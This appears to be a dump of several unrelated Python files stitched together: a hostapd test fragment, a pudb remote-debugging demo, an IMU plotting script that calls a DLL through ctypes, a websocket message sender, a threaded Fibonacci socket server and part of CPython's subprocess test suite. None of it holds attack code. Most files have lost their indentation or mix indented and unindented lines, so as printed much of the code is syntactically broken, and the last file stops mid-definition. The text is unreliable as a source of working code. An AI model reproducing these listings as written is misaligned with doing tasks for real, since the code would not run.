dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.wait_event(["AP-STA-DISCONNECTED"], timeout=1)
|
multiprocess_main.py
|
# -*- encoding: utf-8 -*-
import multiprocessing as mp
import time
from pudb.remote import set_trace
def worker(worker_id):
""" Simple worker process"""
i = 0
while i < 10:
if worker_id == 1: # debug process with id 1
set_trace(term_size=(80, 24))
time.sleep(1) # represents some work
print('In Process {}, i:{}'.format(worker_id, i))
i = i + 1
if __name__ == '__main__':
processes = []
for p_id in range(2): # 2 worker processes
p = mp.Process(target=worker, args=(p_id,))
p.start()
processes.append(p)
for p in processes:
p.join()
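# Usage note (not part of the original script): pudb.remote.set_trace() pauses only
# worker 1 and serves the debugger over telnet; attach from another terminal using
# the host/port that set_trace() prints (pudb's usual default is port 6899) while the
# other worker keeps running and printing.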
|
graph_maker.py
|
# * MakeGraphUsingTinyEKFDLL
# *
# * Copyright (C) 2022 DukiChoi
# *
# * MIT License
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from mpl_toolkits.mplot3d import Axes3D
# Data Load
import serial
import time
import signal
import threading
import ctypes
from ctypes import *
import os
#os.add_dll_directory(os.getcwd())
os.environ['PATH'] = './lib.dll' + os.pathsep + os.environ['PATH']
i = c_double(0)
pi = pointer(i)
x = []
y = []
z = []
port = 'COM6'
baud = 9600
exitThread = False
# %%
# ANIMATION FUNCTION
def func(num, dataSet, line, redDots):
# NOTE: there is no .set_data() for 3 dim data...
line.set_data(dataSet[0:2, :num])
line.set_3d_properties(dataSet[2, :num])
redDots.set_data(dataSet[0:2, :num])
redDots.set_3d_properties(dataSet[2, :num])
return line
# %%
def handler(signum, frame):
    global exitThread
    exitThread = True
# function to process received data
def parsing_data(data):
tmp = ''.join(data)
print(tmp)
# serial read thread
def readThread(ser):
global line
global exitThread
global x
global y
global z
while not exitThread:
idx = 0
for c in ser.read():
if idx % 3 == 0:
x.append(float(c))
elif idx % 3 == 1:
y.append(float(c))
else:
z.append(float(c))
idx = idx + 1
# %% [markdown]
#
# %% [markdown]
#
# %%
# %%
if __name__ == "__main__":
# %%
    # register the termination signal handler
# signal.signal(signal.SIGINT, handler)
#
# ser = serial.Serial(port, baud, timeout=0)
# if ser.readable():
# res = ser.readline()
# # print(res)
#
# thread = threading.Thread(target=readThread, args=(ser,))
# thread.start()
#
# plot
    # read the csv file into a pandas array
    ##### enter the txt file name and the number of data points here #####
##############################################
file_name = "circle_test2"
##############################################
    # changing the number of data points requires rebuilding the DLL; it is set to 100 points by default.
data_amount = 100
    # convert to csv and read the 9-axis data
df = pd.read_csv('./test_files/' + file_name + '.txt', sep = '\t')
df.to_csv(r'./test_files/'+ file_name + '.csv')
new_df = pd.read_csv('./test_files/'+ file_name + '.csv')
m = new_df.values
#print(m)
data_matrix1 = m[0:data_amount, 3:6].astype(np.float64)
data_matrix2 = m[0:data_amount, 6:9].astype(np.float64)
data_matrix3 = m[0:data_amount, 13:16].astype(np.float64)
print("입력값 A행렬:\n" , data_matrix1)
print("입력값 W행렬:\n" , data_matrix2)
print("입력값 H행렬:\n" , data_matrix3)
    # wrap the input arrays as ctypes pointers
filter1 = np.array(data_matrix1, dtype=np.float64)
pointer_a = filter1.ctypes.data_as(ctypes.POINTER(ctypes.c_double*(data_amount*3)))
filter2 = np.array(data_matrix2, dtype=np.float64)
pointer_b = filter2.ctypes.data_as(ctypes.POINTER(ctypes.c_double*(data_amount*3)))
filter3 = np.array(data_matrix3, dtype=np.float64)
pointer_c = filter3.ctypes.data_as(ctypes.POINTER(ctypes.c_double*(data_amount*3)))
    # use ctypes to pass the 9-axis data to the DLL function as three input arrays and receive one output array
print("Dll function call")
libc = ctypes.CDLL('./Dll_lib.dll')
    # function input: three pointers to data_amount*3 doubles each (900 values in total)
    libc.make_string.argtypes = [ctypes.POINTER(ctypes.c_double*(data_amount*3)), ctypes.POINTER(ctypes.c_double*(data_amount*3)), ctypes.POINTER(ctypes.c_double*(data_amount*3))]  # argtypes must be an ordered sequence, not a set
    # function output: a pointer to data_amount*3 doubles (300 values)
libc.make_string.restype = ctypes.POINTER(ctypes.c_double*(data_amount*3))
arrayptr = libc.make_string(pointer_a, pointer_b, pointer_c)
c_array = [x for x in arrayptr.contents]
print("S행렬 출력: ", len(c_array), "개 \n", c_array)
    # # experimental area...
    # # converting a python array into a c++ pointer array with ctypes; the c++ side still needs to be implemented.
# filter = np.array([[1, 0, 1], [1, 0, 1], [1, -1, 0]], dtype=np.float64)
# a = filter.ctypes.data_as(ctypes.POINTER(ctypes.c_double*9))
# print([x for x in a.contents])
    # split the returned c_array values into x, y, z components
    idx = 0
    for c in c_array:
        if idx % 3 == 0:
            x.append(c)
        elif idx % 3 == 1:
            y.append(c)
        elif idx % 3 == 2:
            z.append(c)
        idx = idx + 1
dataSet = np.array([x, y, z])
#print(x)
#print(y)
#print(z)
numDataPoints = 100
# GET SOME MATPLOTLIB OBJECTS
fig = plt.figure()
ax = Axes3D(fig)
redDots = plt.plot(dataSet[0], dataSet[1], dataSet[2], lw=2, c='r', marker='o')[0] # For scatter plot
# NOTE: Can't pass empty arrays into 3d version of plot()
line = plt.plot(dataSet[0], dataSet[1], dataSet[2], lw=2, c='g')[0] # For line plot
    # AXES PROPERTIES
ax.set_xlim3d([-10, 10])
ax.set_ylim3d([-10, 10])
ax.set_zlim3d([-10, 10])
ax.set_xlabel('X(t)')
ax.set_ylabel('Y(t)')
ax.set_zlabel('Z(t)')
ax.set_title('Trajectory of electron for E vector along [120]')
# Creating the Animation object
line_ani = animation.FuncAnimation(fig, func, frames=numDataPoints, fargs=(dataSet, line, redDots), interval=50,
blit=False)
# line_ani.save(r'Animation.mp4')
plt.show()
|
socket_sender.py
|
import os
import json
import logging
import datetime
from threading import Thread
logger = logging.getLogger(__name__)
# The SocketSender runs a thread that sends messages (temporarily stored in DB) out to websockets.
class SocketSender(Thread):
def __init__(self):
logger.info('init socket sender')
Thread.__init__(self, daemon=True)
self.connections = [] # list of WebSocketConnection objects
# register a client (possible message recipient)
def register(self, ws_conn):
logger.info('client registered (%s)', ws_conn)
self.connections.append(ws_conn)
    # unregister a client (e.g. after it has been closed)
def unregister(self, ws_conn):
logger.info('client unregistered (%s)', ws_conn)
self.connections.remove(ws_conn)
# send a message to a specific client (using websocket connection specified in ws_conn)
def send(self, ws_conn, message):
# if it was recently closed, it may still be in the list of connections; it should be removed as soon as manage_web_socket terminates
if not ws_conn.ws.closed:
try:
ws_conn.ws.send(message)
except Exception: # pylint: disable=broad-except
                logger.warning('unable to send to websocket (%s)', ws_conn)
# send a message structure to a specific client
def send_message(self, ws_conn, message_type, parameters):
message_struct = {
'type': message_type,
'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',
'parameters': parameters
}
self.send(ws_conn, json.dumps(message_struct))
# send an error message back to a client
def send_error(self, ws_conn, message_text):
self.send_message(ws_conn, 'error', {'message': message_text})
# this function sits in a loop, waiting for messages that need to be sent out to subscribers
def run(self):
from main.app import message_queue
while True:
# get all messages since the last message we processed
messages = message_queue.receive()
logger.debug('received %d messages from message queue', messages.count())
for message in messages:
logger.debug('message type: %s, folder: %s', message.type, message.folder_id)
# handle special messages aimed at this module
if message.type == 'requestProcessStatus':
self.send_process_status()
# all other messages are passed to clients managed by this process
else:
for ws_conn in self.connections:
if client_is_subscribed(message, ws_conn, False):
message_struct = {
'type': message.type,
'timestamp': message.timestamp.isoformat() + 'Z',
'parameters': json.loads(message.parameters)
}
Thread(target=self.send, daemon=True, args=[ws_conn, json.dumps(message_struct)]).start()
if ws_conn.controller_id:
logger.debug('sending message to controller; type: %s', message.type)
else:
logger.debug('sending message to browser; type: %s', message.type)
# send information about the current process as a message to the system folder
# (in a multi-process environment, each process has an instance of this class)
# fix(clean): move elsewhere?
def send_process_status(self):
from main.app import db # import here to avoid import loop
from main.app import message_queue # import here to avoid import loop
from main.resources.resource_util import find_resource # import here to avoid import loop
process_id = os.getpid()
connections = []
for ws_conn in self.connections:
connections.append({
'connected': ws_conn.connected(),
'controller_id': ws_conn.controller_id,
'user_id': ws_conn.user_id,
'auth_method': ws_conn.auth_method,
'process_id': process_id,
'subscriptions': [s.as_dict() for s in ws_conn.subscriptions],
})
parameters = {
'process_id': process_id,
'clients': connections, # fix(later): rename to connections?
'db_pool': db.engine.pool.size(),
'db_conn': db.engine.pool.checkedout(),
}
system_folder_id = find_resource('/system').id
message_queue.add(system_folder_id, '/system', 'processStatus', parameters)
# returns True if the given message should be sent to the given client (based on its current subscriptions)
# fix(clean): move into wsConn?
def client_is_subscribed(message, ws_conn, debug_mode):
if message.sender_controller_id:
if ws_conn.controller_id and message.sender_controller_id == ws_conn.controller_id:
return False # don't bounce messages back to controller sender
if ws_conn.user_id and message.sender_user_id == ws_conn.user_id:
return False # don't bounce messages back to user sender (note this prevents sending message from one browser tab to another)
for subscription in ws_conn.subscriptions:
if subscription.matches(message):
if debug_mode:
print(' client subscription matches; folders: %s, type: %s' % (subscription.folder_ids, subscription.message_type))
return True
else:
if debug_mode:
print(' client subscription does not match; folders: %s, type: %s' % (subscription.folder_ids, subscription.message_type))
return False
# clear controller connection status on startup
def clear_web_sockets():
# fix(soon): what if we spin up another process after some are connected?
from main.resources.models import ControllerStatus # would like to do at top, but creates import loop in __init__
from main.app import db # would like to do at top, but creates import loop in __init__
controller_statuses = ControllerStatus.query.all()
for controller_status in controller_statuses:
controller_status.web_socket_connected = False
db.session.commit()
db.session.close()
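# Rough usage sketch (assumptions: running inside the web app so main.app provides
# message_queue/db, and `ws_conn` is a WebSocketConnection created by the websocket
# handler, which lives outside this module):
#
#   sender = SocketSender()
#   sender.start()                 # begin draining the message queue to subscribed clients
#   sender.register(ws_conn)       # when a websocket connects
#   sender.send_message(ws_conn, 'status', {'text': 'connected'})
#   sender.unregister(ws_conn)     # when the websocket closes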
|
server.py
|
# Much of this code follows verbatim after David Beazley's excellent "Concurrency from the Ground Up"
# https://www.youtube.com/watch?v=MCs5OvhV9S4
# Please refer to David's terms of license; the MIT license might not apply to this code
# server.py
# Fib microservice
from socket import *
from fib import fib
from threading import Thread
from concurrent.futures import ProcessPoolExecutor as Pool # concurrent.futures available for >= Py3.2
pool = Pool(4)
def fib_server(address):
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind(address)
sock.listen(5)
while True:
client, addr = sock.accept()
print("Connection", addr)
Thread(target=fib_handler, args=(client,), daemon=True).start() # Daemon argument for Thread in >= Py3.3
def fib_handler(client):
while True:
req = client.recv(100)
if not req:
break
n = int(req)
future = pool.submit(fib, n)
result = future.result()
resp = str(result).encode('ascii') + b'\n'
client.send(resp)
print("Closed")
fib_server(('', 20000))
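# Client sketch (assumption: run from a separate process while the server above is
# listening on port 20000). Requests are decimal numbers; each reply is the ASCII
# result terminated by a newline.
#
#   from socket import socket, AF_INET, SOCK_STREAM
#   sock = socket(AF_INET, SOCK_STREAM)
#   sock.connect(('localhost', 20000))
#   sock.send(b'20')
#   print(sock.recv(100))  # newline-terminated fib(20)
#   sock.close()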
|
test_subprocess.py
|
import unittest
from test import test_support
import subprocess
import sys
import platform
import signal
import os
import errno
import tempfile
import time
import re
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
try:
import resource
except ImportError:
resource = None
try:
import threading
except ImportError:
threading = None
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
test_support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = re.sub(r"\[\d+ refs\]\r?\n?$", "", stderr)
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print 'BDFL'"])
self.assertIn('BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn('BDFL', output)
def test_check_output_stdout_arg(self):
# check_output() function stderr redirected to stdout
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print 'will not be run'"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with test_support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print "banana"'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print \'test_stdout_none\'"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), 'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print "banana"'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def test_executable_with_cwd(self):
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(["somethingyoudonthave", "-c",
"import sys; sys.exit(47)"],
executable=sys.executable, cwd=python_dir)
p.wait()
self.assertEqual(p.returncode, 47)
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
p = subprocess.Popen(["somethingyoudonthave", "-c",
"import sys; sys.exit(47)"],
executable=sys.executable)
p.wait()
self.assertEqual(p.returncode, 47)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write("pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
os.write(d, "pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
tf.write("pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), "orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), "orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), "strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), "strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), "strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), "appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), "appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), 'test with stdout=1')
def test_cwd(self):
tmpdir = tempfile.gettempdir()
# We cannot use os.path.realpath to canonicalize the path,
# since it doesn't expand Tru64 {memb} strings. See bug 1063571.
cwd = os.getcwd()
os.chdir(tmpdir)
tmpdir = os.getcwd()
os.chdir(cwd)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getcwd())'],
stdout=subprocess.PIPE,
cwd=tmpdir)
self.addCleanup(p.stdout.close)
normcase = os.path.normcase
self.assertEqual(normcase(p.stdout.read()), normcase(tmpdir))
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "orange")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate("pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, "pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate("banana")
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr, "pineapple")
# This test is Linux specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
fd_directory = '/proc/%d/fd' % os.getpid()
num_fds_before_popen = len(os.listdir(fd_directory))
p = subprocess.Popen([sys.executable, "-c", "print('')"],
stdout=subprocess.PIPE)
p.communicate()
num_fds_after_communicate = len(os.listdir(fd_directory))
del p
num_fds_after_destruction = len(os.listdir(fd_directory))
self.assertEqual(num_fds_before_popen, num_fds_after_destruction)
self.assertEqual(num_fds_before_popen, num_fds_after_communicate)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
if mswindows:
pipe_buf = 512
else:
pipe_buf = os.fpathconf(x, "PC_PIPE_BUF")
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("xyz"*%d);'
'sys.stdout.write(sys.stdin.read())' % pipe_buf],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = "abc"*pipe_buf
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write("banana")
(stdout, stderr) = p.communicate("split")
self.assertEqual(stdout, "bananasplit")
self.assertStderrEqual(stderr, "")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
stdout = p.stdout.read()
if hasattr(file, 'newlines'):
# Interpreter with universal newline support
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'sys.stdout.write("line1\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line2\\r");'
'sys.stdout.flush();'
'sys.stdout.write("line3\\r\\n");'
'sys.stdout.flush();'
'sys.stdout.write("line4\\r");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline5");'
'sys.stdout.flush();'
'sys.stdout.write("\\nline6");'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
if hasattr(file, 'newlines'):
# Interpreter with universal newline support
self.assertEqual(stdout,
"line1\nline2\nline3\nline4\nline5\nline6")
else:
# Interpreter without universal newline support
self.assertEqual(stdout,
"line1\nline2\rline3\r\nline4\r\nline5\nline6")
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
try:
for i in range(max_handles):
try:
handles.append(os.open(test_support.TESTFN,
os.O_WRONLY | os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
test_support.unlink(test_support.TESTFN)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(1)"])
count = 0
while p.poll() is None:
time.sleep(0.1)
count += 1
# We expect that the poll loop probably went around about 10 times,
# but, based on system scheduling we can't control, it's possible
# poll() never returned None. It "should be" very rare that it
# didn't go around at least twice.
self.assertGreaterEqual(count, 2)
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(2)"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_leaking_fds_on_error(self):
